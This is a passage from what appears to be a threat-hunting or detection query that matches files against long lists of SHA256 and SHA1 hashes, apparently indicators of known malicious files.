ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003%' ESCAPE '\\' OR Hashes LIKE '%SHA256=26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15%' ESCAPE '\\' OR Hashes LIKE '%SHA256=543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433%' ESCAPE '\\' OR Hashes LIKE '%SHA256=da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', 
'609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 
'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', 
'65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', 
'3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 
'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 
'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', 
'2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 